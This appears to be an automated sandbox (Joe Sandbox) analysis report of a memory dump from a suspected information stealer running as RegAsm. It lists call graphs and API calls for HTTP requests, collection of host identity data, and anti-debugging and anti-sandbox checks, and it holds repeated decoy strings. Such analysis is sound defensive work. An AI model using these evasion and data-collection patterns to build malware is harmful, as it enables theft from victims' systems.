            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
            • API String ID: 2127927946-2218711628
            • Opcode ID: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
            • Instruction ID: 04d817b79848fc48b59ba69504da24c7d1b3191c531f4b94b2025844f93bc58f
            • Opcode Fuzzy Hash: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
            • Instruction Fuzzy Hash: E941BB79740624EBC71C9FE5EC89B987F71AB4C712BA0C062F90299190C7F9D5019B3D

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 725 4062d0-40635b call 41a170 call 404800 call 41a110 InternetOpenA 733 406364-406368 725->733 734 40635d 725->734 735 406559-406575 call 41a170 call 41a1d0 * 2 733->735 736 40636e-406392 InternetConnectA 733->736 734->733 752 406578-40657d 735->752 737 406398-40639c 736->737 738 40654f-406552 736->738 741 4063aa 737->741 742 40639e-4063a8 737->742 738->735 744 4063b4-4063e2 HttpOpenRequestA 741->744 742->744 746 406545-406548 744->746 747 4063e8-4063ec 744->747 746->738 749 406415-406455 HttpSendRequestA 747->749 750 4063ee-40640e 747->750 754 406457-406477 call 41a110 call 41a1d0 * 2 749->754 755 40647c-40649b call 4183e0 749->755 750->749 754->752 760 406519-406539 call 41a110 call 41a1d0 * 2 755->760 761 40649d-4064a4 755->761 760->752 764 4064a6-4064d0 InternetReadFile 761->764 765 406517-40653e 761->765 770 4064d2-4064d9 764->770 771 4064db 764->771 765->746 770->771 774 4064dd-406515 call 41a380 call 41a270 call 41a1d0 770->774 771->765 774->764
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000,00420DE3), ref: 00406331
            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
            • HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 004063D5
            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Internet$??2@$HttpOpenRequest$ConnectCrackFileReadSend
            • String ID: ERROR$ERROR$GET
            • API String ID: 1095854997-2509457195
            • Opcode ID: 37c9a35f6efc1406ab06139e2c56cf7233533a6dde65a2729a3abd1b6f546bcc
            • Instruction ID: cbac5eee591d607aa173065357eefb87c001816e051c1cde1c99a9b9dc38779b
            • Opcode Fuzzy Hash: 37c9a35f6efc1406ab06139e2c56cf7233533a6dde65a2729a3abd1b6f546bcc
            • Instruction Fuzzy Hash: AA719F71A00218EBDB24DFA0DC49FEEB775AF44704F1080AAF50A6B1D0DBB86A85CF55
            APIs
            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: NameUser
            • String ID:
            • API String ID: 2645101109-0
            • Opcode ID: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
            • Instruction ID: d97db1a59c4db881a004fd13fa95f43a4b4e799dc382b7b3ddd968380e0460c3
            • Opcode Fuzzy Hash: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
            • Instruction Fuzzy Hash: B6F04FB1944648AFC710DF98DD45BAEBBB9FB08B21F10021AFA15A3690C7745545CBA1
            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
            • Instruction ID: 6710e554edad90447a57410479f56be173a40300ace114c8cd68aa34356edfab
            • Opcode Fuzzy Hash: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
            • Instruction Fuzzy Hash: 17D05E74D0020CDBCB14DFE09A49ADDBB7AAB0D321F001656ED0572240DA305446CA65

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 784 4195e0-4195ea 785 4195f0-419a01 784->785 786 419a06-419a9a LoadLibraryA * 5 784->786 785->786 793 419b16-419b1d 786->793 794 419a9c-419b11 786->794 796 419b23-419be1 793->796 797 419be6-419bed 793->797 794->793 796->797 799 419c68-419c6f 797->799 800 419bef-419c63 797->800 801 419c75-419d02 799->801 802 419d07-419d0e 799->802 800->799 801->802 806 419d14-419dea 802->806 807 419def-419df6 802->807 806->807 809 419e72-419e79 807->809 810 419df8-419e6d 807->810 816 419e7b-419ea7 809->816 817 419eac-419eb3 809->817 810->809 816->817 820 419ee5-419eec 817->820 821 419eb5-419ee0 817->821 826 419fe2-419fe9 820->826 827 419ef2-419fdd 820->827 821->820 833 419feb-41a048 826->833 834 41a04d-41a054 826->834 827->826 833->834 838 41a056-41a069 834->838 839 41a06e-41a075 834->839 838->839 851 41a077-41a0d3 839->851 852 41a0d8-41a0d9 839->852 851->852
            APIs
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A0D
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A1E
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A42
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A77
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A88
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: HttpQueryInfoA$InternetSetOptionA
            • API String ID: 1029625771-1775429166
            • Opcode ID: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
            • Instruction ID: de404ee9f47513f53d28e8016dc56f999ad60f1515a6c9981bc8237813ea7153
            • Opcode Fuzzy Hash: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
            • Instruction Fuzzy Hash: 946243B5500E00AFC774DFA8EE88D1E3BABBB8C761750A51AE609C3674D7349443DBA4

            Control-flow Graph

            APIs
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$CrackInternet
            • String ID: <
            • API String ID: 676793843-4251816714
            • Opcode ID: 2f4ab3673443420506f52f30828b11760ea29e85b2ca068c11f228e25f55c4dd
            • Instruction ID: 93cf72731df314aae8b190796811ac6c8ed605cccc68025416595ba5c6ffb16c
            • Opcode Fuzzy Hash: 2f4ab3673443420506f52f30828b11760ea29e85b2ca068c11f228e25f55c4dd
            • Instruction Fuzzy Hash: 0A2129B1D00208ABDF14DFA5E849ADD7B75FF44364F108229F926A72D0DB706A05CF95

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1146 4112b0-4112dd call 41a4a0 1150 4112e7-411301 call 41a4a0 strtok_s 1146->1150 1151 4112df-4112e1 ExitProcess 1146->1151 1154 411304-411308 1150->1154 1155 4114d2-4114dd call 41a1d0 1154->1155 1156 41130e-411321 1154->1156 1158 411327-41132a 1156->1158 1159 4114ae-4114cd strtok_s 1156->1159 1161 411401-411412 1158->1161 1162 411461-411472 1158->1162 1163 411480-411491 1158->1163 1164 411423-411434 1158->1164 1165 411442-411453 1158->1165 1166 411345-411354 call 41a1f0 1158->1166 1167 41136d-41137e 1158->1167 1168 41138f-4113a0 1158->1168 1169 411331-411340 call 41a1f0 1158->1169 1170 411359-411368 call 41a1f0 1158->1170 1171 4113bd-4113ce 1158->1171 1172 4113df-4113f0 1158->1172 1173 41149f-4114a9 call 41a1f0 1158->1173 1159->1154 1192 411414-411417 1161->1192 1193 41141e 1161->1193 1200 411474-411477 1162->1200 1201 41147e 1162->1201 1204 411493-411496 1163->1204 1205 41149d 1163->1205 1194 411440 1164->1194 1195 411436-411439 1164->1195 1196 411455-411458 1165->1196 1197 41145f 1165->1197 1166->1159 1198 411380-411383 1167->1198 1199 41138a 1167->1199 1202 4113a2-4113ac 1168->1202 1203 4113ae-4113b1 1168->1203 1169->1159 1170->1159 1206 4113d0-4113d3 1171->1206 1207 4113da 1171->1207 1190 4113f2-4113f5 1172->1190 1191 4113fc 1172->1191 1173->1159 1190->1191 1191->1159 1192->1193 1193->1159 1194->1159 1195->1194 1196->1197 1197->1159 1198->1199 1199->1159 1200->1201 1201->1159 1208 4113b8 1202->1208 1203->1208 1204->1205 1205->1159 1206->1207 1207->1159 1208->1159
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strtok_s$ExitProcess
            • String ID: block
            • API String ID: 762877946-2199623458
            • Opcode ID: 1ba1f058e3e2379031d11e79f6d2bdd312730fa939e98f1981bd39696260f1a4
            • Instruction ID: b2aee4bd772402993bd8daf8ed4e127407cef198cc172b88b11a84757ccddcb3
            • Opcode Fuzzy Hash: 1ba1f058e3e2379031d11e79f6d2bdd312730fa939e98f1981bd39696260f1a4
            • Instruction Fuzzy Hash: 6451A574B00209EFDB14DFA0E944BEE37B5BF44B04F10804AE916A7361D778D996CB5A

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1209 416fa0-416fea 1211 416ff3-417067 GetVolumeInformationA call 4187a0 * 3 1209->1211 1212 416fec 1209->1212 1219 417078-41707f 1211->1219 1212->1211 1220 417081-41709a call 4187a0 1219->1220 1221 41709c-4170b7 1219->1221 1220->1219 1227 4170b9-4170c6 call 41a110 1221->1227 1228 4170c8-4170f8 call 41a110 1221->1228 1232 41711e-41712e 1227->1232 1228->1232
            APIs
            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InformationVolume
            • String ID: :$C$\
            • API String ID: 2039140958-3809124531
            • Opcode ID: b8d4498c9ef52ac0e7ff8a74a815c8f3508d9b1454889a6f46a668afd64d8a13
            • Instruction ID: 54c0e4e4c236f1d7f0585d8ba6b1fa909b8b3bfc40374ef6a46e6daa0de72561
            • Opcode Fuzzy Hash: b8d4498c9ef52ac0e7ff8a74a815c8f3508d9b1454889a6f46a668afd64d8a13
            • Instruction Fuzzy Hash: 1341B1B1D04248EBDB20DFA4CC45BEEBBB8AF08714F14009DF50967281D7786A84CBA9

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1235 401220-401247 call 418450 GlobalMemoryStatusEx 1238 401273-40127a 1235->1238 1239 401249-401271 call 41d3f0 * 2 1235->1239 1240 401281-401285 1238->1240 1239->1240 1242 401287 1240->1242 1243 40129a-40129d 1240->1243 1245 401292 1242->1245 1246 401289-401290 1242->1246 1245->1243 1246->1243 1246->1245
            APIs
            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
            • __aulldiv.LIBCMT ref: 00401258
            • __aulldiv.LIBCMT ref: 00401266
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __aulldiv$GlobalMemoryStatus
            • String ID: @
            • API String ID: 2185283323-2766056989
            • Opcode ID: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
            • Instruction ID: 3a295e2926d3a661784167dae5cc93d3585e5da9a2cb48fc087cd8b2851d2611
            • Opcode Fuzzy Hash: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
            • Instruction Fuzzy Hash: 8601FBB0D40308BAEB10EBE4DD49B9EBB78AB14705F20809EEA05B62D0D7785585875D

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1491 419270-419284 call 419160 1494 4194a3-419502 LoadLibraryA * 2 1491->1494 1495 41928a-41949e call 419190 1491->1495 1503 419504-419518 1494->1503 1504 41951d-419524 1494->1504 1495->1494 1503->1504 1505 419556-41955d 1504->1505 1506 419526-419551 1504->1506 1509 419578-41957f 1505->1509 1510 41955f-419573 1505->1510 1506->1505 1511 419581-419594 1509->1511 1512 419599-4195a0 1509->1512 1510->1509 1511->1512 1515 4195d1-4195d2 1512->1515 1516 4195a2-4195cc 1512->1516 1516->1515
            APIs
            • LoadLibraryA.KERNEL32(?,?,004164A0), ref: 004194AA
            • LoadLibraryA.KERNEL32(?,?,004164A0), ref: 004194DF
            Strings
            • NtQueryInformationProcess, xrefs: 004195BA
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: NtQueryInformationProcess
            • API String ID: 1029625771-2781105232
            • Opcode ID: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
            • Instruction ID: 826a308167d33dd6e89c68d84aa8ae535e40b86c028b310e96c4c1ecb1cfdbe7
            • Opcode Fuzzy Hash: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
            • Instruction Fuzzy Hash: D3A171B5500A00EFC764DF68ED88E1E3BBBBB4C361B50A51AEA05C3674D7349843DBA5

            Control-flow Graph

            APIs
              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
            • GetUserDefaultLCID.KERNEL32 ref: 004164C6
              • Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
              • Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoMemoryNumaStatusSystemVirtual
            • String ID:
            • API String ID: 3178950686-0
            • Opcode ID: 097da323ac4eb8756f48a57aff9b622020cd776e5523750053ba436d79081546
            • Instruction ID: c6285a65dcb1a135c62ded655b7a731d229dd5b525af539dc0d6bcccc6ed86c8
            • Opcode Fuzzy Hash: 097da323ac4eb8756f48a57aff9b622020cd776e5523750053ba436d79081546
            • Instruction Fuzzy Hash: B0319230941108BACB04FBF1DC56BEE7339AF14318F10452EF91366092DFBC6985C66A
            APIs
            • GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ComputerName
            • String ID:
            • API String ID: 3545744682-0
            • Opcode ID: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
            • Instruction ID: 42712b1d228129e2e67f3f866f9c43061177fb5da2658b34d54d74d13c44c576
            • Opcode Fuzzy Hash: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
            • Instruction Fuzzy Hash: BC0181B1A08608EBC710CF99DD45BEEBBB8FB04721F20021AF905E3690D7785945CBA5
            APIs
            • VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocNumaVirtual
            • String ID:
            • API String ID: 4233825816-0
            • Opcode ID: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
            • Instruction ID: 0e2e6d3d2f445679f77a7861b9af8e0e8f55b174cdb9f0aa425208459b8dc1b3
            • Opcode Fuzzy Hash: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
            • Instruction Fuzzy Hash: 3DE08670945308FBE7205FA09C0AB4D76689B04B05F105056F708BA1E0C6B82501865C
            APIs
            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,004164BC), ref: 004010B3
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
            • Instruction ID: f48f966fb8dbc32d8d9482a6eca9c47ea769ab036d71d5fa6551aa32425d7b68
            • Opcode Fuzzy Hash: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
            • Instruction Fuzzy Hash: 62F02771641218BBE7149BA4AD49FAFB7DCE705B08F304459F940E3390D5719F00DA64
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 0041B562
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041B577
            • UnhandledExceptionFilter.KERNEL32(0041F298), ref: 0041B582
            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041B59E
            • TerminateProcess.KERNEL32(00000000), ref: 0041B5A5
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 2579439406-0
            • Opcode ID: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
            • Instruction ID: e298f46f0b3396334d2e2e37c4a67069ca1d3d313a6b9180192500d6cd60c5fb
            • Opcode Fuzzy Hash: f83f28cb76d01a588ba20aedf737648f300cf2348463cefc92e4954df8d9d801
            • Instruction Fuzzy Hash: 2F21D678600214DFD720EF59F9D4AA97BB5FB08314F90803AE809D7261E7B46586CF9D
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_0001C897), ref: 0041C8DE
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 92af57a2eb04ab3802c4d219b965fa46d3e89a576cd6fa8fbae2cab6dd9d340f
            • Instruction ID: 8e4dbfb736b9908720f30fe25f95c1a3b6087da1e007f902b0e4d68da9f23204
            • Opcode Fuzzy Hash: 92af57a2eb04ab3802c4d219b965fa46d3e89a576cd6fa8fbae2cab6dd9d340f
            • Instruction Fuzzy Hash: 8D9002B829111456561037719D896896D905ACC6137554861B405C4055EA9841849529
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
            APIs
            • strtok_s.MSVCRT ref: 0041015B
            • memset.MSVCRT ref: 0041051D
              • Part of subcall function 00418380: malloc.MSVCRT ref: 00418388
              • Part of subcall function 00418380: strncpy.MSVCRT ref: 004183A3
